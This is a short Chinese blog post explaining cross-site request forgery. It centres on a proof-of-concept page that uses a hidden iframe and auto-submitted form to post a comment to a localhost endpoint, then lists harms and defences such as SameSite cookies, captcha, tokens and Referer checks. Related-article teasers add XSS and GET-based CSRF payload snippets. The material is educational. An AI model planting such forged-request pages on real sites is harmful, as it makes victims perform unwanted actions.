前端CSRF攻击

最新推荐文章于 2023-05-19 21:41:07 发布
最新推荐文章于 2023-05-19 21:41:07 发布
阅读量296 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gzkahjl/article/details/93667154
版权

cross site request forhy(CSRF)跨站请求攻击

案例:诱导用户打开第三网站,进行攻击,例如:

<body>
        hello,这里什么也没有。
        <script>
            document.write(`
                <form name="commentForm" target="csrf" method="post" action="http://localhost:1521/post/addComment">
                    <input name="postId" type="hidden" value="1">
                    <textarea name="content">来自CSRF!</textarea>
                </form>`
            );

            var iframe = document.createElement('iframe');
            iframe.name = 'csrf';
            iframe.style.display = 'none';
            document.body.appendChild(iframe);

            setTimeout(function(){
                document.querySelector('[name=commentForm]').submit();
            },1000);
        </script>
    </body>

图示:

危害:盗取用户自己(转账、消费)、冒充用户发帖背锅、损坏网站声誉等等。

防御:

  1. 禁止第三方网站带cookie   --> same-site(兼容性不好)
  2. 在涉及攻击前端页面加入验证码
  3. token
  4. referer判断
gzkahjl
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
前端安全:如何防止CSRF攻击
02-24
随着互联网的高速发展,信息安全问题已经成为企业最为关注的焦点之一,而前端又是引发企业安全问题的高危据点。在移动互联网时代,前端人员除了传统的XSS、CSRF等安全问题之外,又时常遭遇网络劫持、非法调用HybridAPI等新型安全问题。当然,浏览器自身也在不断在进化和发展,不断引入CSP、Same-SiteCookies等新技术来增强安全性,但是仍存在很多潜在的威胁,这需要前端技术人员不断进行“查漏补缺”。近几年,美团业务高速发展,前端随之面临很多安全挑战,因此积累了大量的实践经验。我们梳理了常见的前端安全问题以及对应的解决方案,将会做成一个系列,希望可以帮助前端同学在日常开发不断预防和修复安
前端安全CSRF
qq_36711388的博客
05-19 2850
安全类:CSRF CSRF:跨站请求伪造,英文:Cross-site request forgery forgery 攻击原理: 从上图可以看出,要完成一次CSRF攻击,受害者必须依次完成两个步骤:   1.登录受信任网站A,并在本地生成Cookie。   2.在不退出A的情况下,访问危险网站B。   看到这里,你也许会说:“如果我不满足以上两个条件的一个,我就不会受到CSRF攻击”。是的,...
前端XSS攻击CSRF攻击
weixin_44823731的博客
12-25 484
1.XSS攻击 XSS攻击:(Cross Site Scripting)跨站脚本攻击。在渲染DOM树的过程执行了不在预期内的js代码,就发生了XSS攻击攻击样例:在一些博客网站,发表一篇文章的时候,在文章加入<script>alert('XSS攻击')</script>这种用script标签包含着的js语句。发表成功之后,当别人访问你的这篇文章的时候,就会自动执行alert('XSS攻击')这段代码。这样就属于xss攻击。更严重的,就在script标签,获取你的cookie
前端安全之XSS和CSRF攻击
公众号:前端充电宝
08-02 606
目录1. 什么是XSS ?1.1 概念1.2 攻击方式1.3 危害1.4 分类2. 如何防御XSS?2.1 设置HttpOnly2.2 输入检查2.3 输出检查3. 什么是CSRF ?3.1 概念3.2 攻击方式4. 如何防御CSRF?4.1 验证码4.2 验证Referer4.3 cookie设置sameSite4.4 添加token验证 1. 什么是XSS ? 1.1 概念 XSS,即 Cross Site Script,是指跨站脚本攻击,原本缩应该为CSS,但是为了和层叠样式表(Cascading
前端安全之CSRF攻击
yleave的博客
07-03 832
个人博客 文章目录几种常见的 CSRF 攻击:1. GET 类型的 CSRF 攻击2. POST 类型的 CSRF 攻击3. 链接类型的 CSRFCSRF 特点防护策略同源检测几种 Referer 策略CSRF TokenCookie 的 SameSite 属性REF CSRF(Cross-site Request Forgery),跨站请求伪造攻击,简单来说就是攻击者诱导受害者进入第三方网站,在第三方网站,向被攻击网站发送请求,并利用受害者在被攻击网站获取的用户凭证,达到冒充受害者的目的,并使用受害
计算机前端-实战.aravel框架2-06.csrf攻击.wmv
06-06
计算机前端-实战.aravel框架2-06.csrf攻击.wmv
网络安全原理与应用:跨站请求伪造CSRF攻击演示.pptx
05-16
跨站请求伪造CSRF攻击演示;;跨站请求伪造CSRF攻击演示;跨站请求伪造CSRF攻击演示;跨站请求伪造CSRF攻击演示;跨站请求伪造CSRF攻击演示;跨站请求伪造CSRF攻击演示;跨站请求伪造CSRF攻击演示;跨站请求伪造CSRF攻击演示...
TokenBasedUnsafe:一个展示XSS和CSRF攻击的网站
05-14
使用JSON Web令牌(JWT)的基于令牌的用户身份验证。 使用RSA算法对JWT的数据进行加密和解密。 后端是使用nodejs和expressjs构建的。 前端是使用带有React钩子的... Webiste演示了XSS和CSRF攻击是如何发生的。
前端安全(二)CSRF
OriginalMIxss的博客
10-25 287
简介 CSRF(Cross-site request forgery) 跨站请求伪造,CSRF简单来说就是攻击者以你的身份去伪造恶意请求,比如以你的身份去发送邮件、消息、盗取账户信息甚至购买商品网上转账等 原理 用户通过浏览器登录信用正常的网站A 服务器验证通过后后传回cookie 用户在没有登出信用网站情况下访问攻击者的危险网站B 网站B会要求访问第三方站点A,并发出请求 浏览器根据网站B的请求,并自动带上之前网站A上的cookie,访问服务器 服务器由于只根据cookie来判断,判断不出是网站A还是B
前端知识】浅谈XSS和CSRF网络攻击
xiaobaizaza_Ry的博客
05-19 1458
前端知识】浅谈XSS和CSRF网络攻击 浏览器攻击是指恶意主体利用浏览器漏洞对用户浏览器进行非法修改、窃取敏感信息或者进行其他有害行为的一种攻击方式。常见的浏览器攻击主要包括跨站脚本攻击(XSS)、跨站点请求伪造攻击CSRF)、DNS劫持攻击等。下面我们主要介绍两种典型的攻击方式——XSS攻击CSRF攻击
前端web安全-CSRF基础入门
笑花大王
02-17 288
前言 今天找了个新地方进行学习 嘿嘿 采光不错!特别适合看书呢。 前言 1.CSRF 跨站请求伪造(英语:Cross-site request forgery),也被称为one-click attack或者session riding,通常缩写为CSRF或者XSRF, 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。跟跨网站脚本(XSS)相比,...
前端安全之 CSRF 攻击原理和防护方法
weixin_59124055的博客
06-13 5942
CSRF(Cross-site request forgery)简称:跨站请求伪造,学习 CSRF 攻击原理和防护方法是我们团队新成员的必修课,通常我都是先让新同学自己研究自己讲,然后我再通过其细节再给他们讲一遍,讲的次数多了,也慢慢总结出一种比较容易理解的讲法。这里我整理成文分享给有需要的人。引言:必修课为什么选择 CSRFCSRF 涉及到的前端知识点比较多,全面理解需要系统的学习 Cookie,前端跨域,HTTP 协议,web 浏览器等知识。理解 CSRF 攻击和防护方法是前端进阶要去,我也希望大家
聊聊前端安全之CSRF
奇舞周刊
01-05 896
本文作者为奇舞团前端开发工程师一、什么是CSRFCSRF(Cross Site Request Forgery,跨站域请求伪造),通常缩写为 CSRFCSRF攻击攻击者通过伪装成受信任用户向服务器发起各种请求,达到欺骗服务器接收并执行指令,造成的一系列危害的一种网络攻击方式。二、CSRF的原理原理流程图形化展示如上图所示,下面为原理流程释义:用户正常登录A网站,登录成功后,A网站将Cooki...
前端面试笔记10:前端安全之 CSRF 攻击
qq_52287721的博客
01-01 2029
前端安全 CSRF 攻击 文章目录前端安全 CSRF 攻击什么是 CSRF 攻击CSRF 攻击的类型GET 类型的 CSRF 攻击POST 类型的 CSRF 攻击防范 CSRF 攻击的方法同源检测方法使用 CSRF Token 进行验证使用双重 Cookie 验证的方法设置 cookie 属性的时候设置 Samesite 什么是 CSRF 攻击CSRF 攻击指的是跨站请求伪造攻击攻击者诱导用户进入一个第三方网站,然后该网站向被攻击网站发送跨站请求。如果用户在被攻击网站保存了登录状态,那么攻击者就可
前端CSRF攻击和XSS攻击
Alive_tree的博客
08-07 378
1、什么是CSRF攻击 CSRF即Cross-site request forgery(跨站请求伪造),是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。 假如黑客在自己的站点上放置了其他网站的外链,例如"www.weibo.com/api ,默认情况下,浏览器会带着weibo.com的cookie访问这个网址,如果用户已登录过该网站且网站没有对CSRF攻击进行防御,那么服务器就会认为是用户本人在调用此接口并执行相关操作,致使账号被劫持。 2、如何防御CSRF攻击 1、验证Tok.
前端的安全防范----CSRF
LuckXinXin的博客
11-18 138
涉及面试题:什么是 CSRF 攻击?如何防范 CSRF 攻击CSRF 文名为跨站请求伪造。原理就是攻击者构造出一个后端请求地址,诱导用户点击或者通过某些途径自动发起请求。如果用户是在登录状态下的话,后端就以为是用户在操作,从而进行相应的逻辑。 举个例子,假设网站有一个通过 GET 请求提交用户评论的接口,那么攻击者就可以在钓鱼网站加入一个图片,图片的地址就是评论接口 <img src="http://www.domain.com/xxx?comment='attack'"/> .
前端安全之CSRF攻击(跨站请求伪造)
热门推荐
业余丰富各种技术栈
08-19 1万+
前端安全之CSRF,日常防范CSRF攻击的几种方式
CSRF攻击原理及防御
weixin_30485799的博客
03-22 403
一、CSRF攻击原理   CSRF是什么呢?CSRF全名是Cross-site request forgery,是一种对网站的恶意利用,CSRF比XSS更具危险性。想要深入理解CSRF攻击特性我们有必要了解一下网站session的工作原理。  session我想大家都不陌生,无论你用.net或PHP开发过网站的都肯定用过session对象,然而session它是如何工作的呢?如...
前端面试题说一下csrf
最新发布
12-07
为了防止CSRF攻击,我们可以采取以下措施: 1. 验证码:在关键操作(如转账、修改密码等)前,要求用户输入验证码,从而防止攻击者通过程序自动提交请求。 2. Referer检查:在服务器端对请求的Referer进行检查,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值